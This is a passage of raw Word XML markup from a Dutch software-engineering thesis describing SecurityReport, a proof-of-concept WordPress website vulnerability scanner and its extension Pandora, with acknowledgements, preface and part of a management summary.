                  <wp:posOffset>1112520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5904865" cy="1488440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="780" name="Text Box 780"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="590486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ABEEC" w14:textId="00B7B99E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Hierbij wil ik graag mijn bedrijfsbegeleider Pim Ruiter bedanken voor zijn begeleiding en steun tijdens mijn afstudeertraject. Hij heeft altijd het vertrouwen in mij gehouden en in het afstudeerproject gehad. Ook wil ik mijn collega’s bedanken voor hun steun en toeverlaat wanneer ik het nodig had. Niek, Rakhal, Manon, Bob, Jordy, Roy, Estée, Mitchel, Leo en Lonneke, bedankt!</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30348D86" w14:textId="7B1699DA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Ik wil mijn stagebegeleider Gerlof Donga bedanken voor zijn begeleiding en bereidheid om mij te helpen wanneer ik het nodig had tijdens mijn afstudeertraject. Ook wil ik Salahdinn El Kawakibi bedanken voor zijn hulp bij het ontwerpen van mijn scri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3A6A" id="Text Box 780" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.8pt;margin-top:87.6pt;width:464.95pt;height:117.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0C3ABEEC" w14:textId="00B7B99E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Hierbij wil ik graag mijn bedrijfsbegeleider Pim Ruiter bedanken voor zijn begeleiding en steun tijdens mijn afstudeertraject. Hij heeft altijd het vertrouwen in mij gehouden en in het afstudeerproject gehad. Ook wil ik mijn collega’s bedanken voor hun steun en toeverlaat wanneer ik het nodig had. Niek, Rakhal, Manon, Bob, Jordy, Roy, Estée, Mitchel, Leo en Lonneke, bedankt!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30348D86" w14:textId="7B1699DA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Ik wil mijn stagebegeleider Gerlof Donga bedanken voor zijn begeleiding en bereidheid om mij te helpen wanneer ik het nodig had tijdens mijn afstudeertraject. Ook wil ik Salahdinn El Kawakibi bedanken voor zijn hulp bij het ontwerpen van mijn scriptie.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253182976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35636F35" wp14:editId="6A2A2476">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="779" name="Text Box 779"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="59055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A891AF" w14:textId="014A3189" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Hierbij presenteer ik aan jullie de scriptie “SecurityReport Proof of Concept Webapplicatie Scanner”. Deze scriptie is geschreven in het kader van mijn afstuderen aan de opleiding Software Engineering aan de Hogeschool van Amsterdam. Het onderzoek en conceptontwikkeling voor het ontwikkelen van een geautomatiseerde webapplicatie scanner heb ik uitgevoerd in opdracht van S5 te Alkm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36F35" id="Text Box 779" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:15.4pt;width:465pt;height:63.2pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2CA891AF" w14:textId="014A3189" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Hierbij presenteer ik aan jullie de scriptie “SecurityReport Proof of Concept Webapplicatie Scanner”. Deze scriptie is geschreven in het kader van mijn afstuderen aan de opleiding Software Engineering aan de Hogeschool van Amsterdam. Het onderzoek en conceptontwikkeling voor het ontwikkelen van een geautomatiseerde webapplicatie scanner heb ik uitgevoerd in opdracht van S5 te Alkmaar.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="662CA841" w14:textId="0899A22E" w:rsidR="0044790A" w:rsidRDefault="00B23545" w:rsidP="00594BF5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253235200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08EF7650" wp14:editId="53DCA96F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2908935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2222500" cy="33274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222500"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5D104" w14:textId="02B79D56" w:rsidR="002A05E5" w:rsidRPr="00B23545" w:rsidRDefault="002A05E5" w:rsidP="00B23545">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B23545">
                              <w:rPr>
                                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>M</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>ohamed El Kawa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F7650" id="Text Box 203" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.65pt;margin-top:229.05pt;width:175pt;height:26.2pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0165D104" w14:textId="02B79D56" w:rsidR="002A05E5" w:rsidRPr="00B23545" w:rsidRDefault="002A05E5" w:rsidP="00B23545">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B23545">
                        <w:rPr>
                          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>M</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>ohamed El Kawakibi</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0044790A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983CC64" w14:textId="00355B78" w:rsidR="0044790A" w:rsidRDefault="00133264" w:rsidP="00A248C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253256704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0425CAC3" wp14:editId="13AB42E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-713105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="243" name="Rectangle 24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D4CB0" id="Rectangle 243" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-56.1pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D588E" w14:textId="23E502CE" w:rsidR="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253176832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14970EA9" wp14:editId="6290B073">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>593090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3112135" cy="3190240"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="62" name="Text Box 62"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3112135" cy="319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07F239" w14:textId="36C973E4" w:rsidR="002A05E5" w:rsidRPr="00142053" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00142053">
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t>Het bedrijf S5 specialiseert zich in het ontwikkelen van website i</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t>n het CMS Wordpress. S5 richt</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00142053">
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> zich</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> sinds kort</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00142053">
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> meer op web security. Zij willen hun diensten uitbreiden door onlineservices</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> aan</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00142053">
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> te bieden met de focus op security.</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> Hiervoor hebben zij bedacht om een webapplicatie scanner online aan te bieden waarmee gebruikers van Wordpress websites hun websites online kunnen laten scannen. Dit met als doel om Wordpress gebruikers en daarmee ook hun klanten meer inzicht te bieden in de securitystatus van hun website. S5 vroeg mij om een concreet concept te ontwikkelen en daar een Proof of Concept van te maken, dit door een Minimal Viable product te ontwikkelen van de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0EA9" id="Text Box 62" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-5.65pt;margin-top:46.7pt;width:245.05pt;height:251.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1F07F239" w14:textId="36C973E4" w:rsidR="002A05E5" w:rsidRPr="00142053" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>Het bedrijf S5 specialiseert zich in het ontwikkelen van website i</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t>n het CMS Wordpress. S5 richt</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> zich</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> sinds kort</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> meer op web security. Zij willen hun diensten uitbreiden door onlineservices</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> aan</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00142053">
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> te bieden met de focus op security.</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> Hiervoor hebben zij bedacht om een webapplicatie scanner online aan te bieden waarmee gebruikers van Wordpress websites hun websites online kunnen laten scannen. Dit met als doel om Wordpress gebruikers en daarmee ook hun klanten meer inzicht te bieden in de securitystatus van hun website. S5 vroeg mij om een concreet concept te ontwikkelen en daar een Proof of Concept van te maken, dit door een Minimal Viable product te ontwikkelen van de webapplicatie scanner.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00411CD7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253181952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29E21C10" wp14:editId="4342C10F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3166110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>590550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3112135" cy="2745740"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="767" name="Text Box 767"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3112135" cy="274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A1AC6" w14:textId="6F7D9F2C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Tijdens mijn onderzoek heb ik mij gefocust op het volgende: kwetsbaarheden die kunnen voorkomen op een website, bestaande webapplicatie scanners om te leren uit wat het is opgebouwd en hoe het in de praktijk te werk gaat en Ik heb onderzocht welke tool ik kan gebruiken bij het ontwikkelen van de webapplicatie scanner. Binnen het afstudeertraject ben ik iteratief te werk gegaan en heb ik een hele test omgeving opgezet en vele test uitgevoerd om het gewenste resultaat te krij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1C10" id="Text Box 767" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:249.3pt;margin-top:46.5pt;width:245.05pt;height:216.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="652A1AC6" w14:textId="6F7D9F2C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Tijdens mijn onderzoek heb ik mij gefocust op het volgende: kwetsbaarheden die kunnen voorkomen op een website, bestaande webapplicatie scanners om te leren uit wat het is opgebouwd en hoe het in de praktijk te werk gaat en Ik heb onderzocht welke tool ik kan gebruiken bij het ontwikkelen van de webapplicatie scanner. Binnen het afstudeertraject ben ik iteratief te werk gegaan en heb ik een hele test omgeving opgezet en vele test uitgevoerd om het gewenste resultaat te krijgen.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001C7F56">
        <w:t>Management</w:t>
      </w:r>
      <w:r w:rsidR="00A248C1">
        <w:t>samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98AB8F" w14:textId="63B373A2" w:rsidR="00A248C1" w:rsidRDefault="00A248C1" w:rsidP="00A248C1"/>
    <w:p w14:paraId="2EFA5F4C" w14:textId="76680595" w:rsidR="00A248C1" w:rsidRPr="00A248C1" w:rsidRDefault="000D7903" w:rsidP="00A248C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253177856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="549AB648" wp14:editId="1EA23CA5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-79375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>149225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2794635" cy="459740"/>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794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B7736" w14:textId="59C3CF18" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>De hoofdvraag die ik binnen dit afstudeerproject zal beantwoorden luidt:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36702ADE" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="520BE022" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="08294A50" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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648" id="Text Box 217" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.25pt;margin-top:11.75pt;width:220.05pt;height:36.2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IRT3wCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI2xUK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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="660B7736" w14:textId="59C3CF18" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>De hoofdvraag die ik binnen dit afstudeerproject zal beantwoorden luidt:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36702ADE" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="520BE022" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="08294A50" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="26612AC0" w14:textId="60861BAB" w:rsidR="00A248C1" w:rsidRDefault="00C435BF" w:rsidP="00A248C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253180928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="616B4B77" wp14:editId="4D6B1D5F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3169920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1224280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3168650" cy="2030095"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="754" name="Text Box 754"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3168650" cy="2030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FF6CD" w14:textId="4E9FE829" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t xml:space="preserve">Het onderzoek, concept ontwikkeling en het ontwikkelen van de Proof of Concept heeft vormgegeven aan twee subsystemen, de Wordpress extensie en de webapplicatie scanner. Het gehele systeem heeft de naam SecurityReport gekregen en de Wordpress extensie heeft de naam Pandora. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D5B883C" w14:textId="3ADBF389" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t xml:space="preserve">SecurityReport en Pandora werken samen om de Wordpress gebruiker een gebruikersvriendelijke ervaring te bieden bij het aanvragen van een scan tot aan het ontvangen van het ra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4B77" id="Text Box 754" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.6pt;margin-top:96.4pt;width:249.5pt;height:159.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32EFF6CD" w14:textId="4E9FE829" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t xml:space="preserve">Het onderzoek, concept ontwikkeling en het ontwikkelen van de Proof of Concept heeft vormgegeven aan twee subsystemen, de Wordpress extensie en de webapplicatie scanner. Het gehele systeem heeft de naam SecurityReport gekregen en de Wordpress extensie heeft de naam Pandora. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D5B883C" w14:textId="3ADBF389" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t xml:space="preserve">SecurityReport en Pandora werken samen om de Wordpress gebruiker een gebruikersvriendelijke ervaring te bieden bij het aanvragen van een scan tot aan het ontvangen van het rapport. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000D7903">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253179904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4081F05E" wp14:editId="13E068F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-69850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1209040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048635" cy="3431540"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="732" name="Text Box 732"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048635" cy="343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D2905" w14:textId="78610E96" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Op basis van deze hoofdvraag ben ik op onderzoek gegaan om beter te begrijpen wat een webapplicatie scanner is en hoe de Wordpress gebruikers er mee hun websites kunnen scannen. In ben tot de conclusie gekomen dat het meest gangbare is om een Wordpress extensie te maken waarmee de gebruikers van de webapplicatie scanner een scan kunnen aanvragen. Ook is het voor iedereen beschikbaar zal zijn maar wel met gelimiteerde opties. Dit om een selectief groep gebruikers, die bestaan uit betalende klanten en klanten die hun website laten bouwen door S5, de volledige gebruikservaring te geven met alle opties die de webapplicatie scanner aanbiedt. Deze selectieve groep noemt men Premiumgebruikers. Het verdienmodel erachter noemt men Freemium. Om dat het systeem een gratis gelimiteerde versie aanbi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F05E" id="Text Box 732" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.5pt;margin-top:95.2pt;width:240.05pt;height:270.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="705D2905" w14:textId="78610E96" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Op basis van deze hoofdvraag ben ik op onderzoek gegaan om beter te begrijpen wat een webapplicatie scanner is en hoe de Wordpress gebruikers er mee hun websites kunnen scannen. In ben tot de conclusie gekomen dat het meest gangbare is om een Wordpress extensie te maken waarmee de gebruikers van de webapplicatie scanner een scan kunnen aanvragen. Ook is het voor iedereen beschikbaar zal zijn maar wel met gelimiteerde opties. Dit om een selectief groep gebruikers, die bestaan uit betalende klanten en klanten die hun website laten bouwen door S5, de volledige gebruikservaring te geven met alle opties die de webapplicatie scanner aanbiedt. Deze selectieve groep noemt men Premiumgebruikers. Het verdienmodel erachter noemt men Freemium. Om dat het systeem een gratis gelimiteerde versie aanbiedt.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000D7903">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253178880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EFC3317" wp14:editId="253584E6">
                <wp:simplePos x="0" y="0"/>
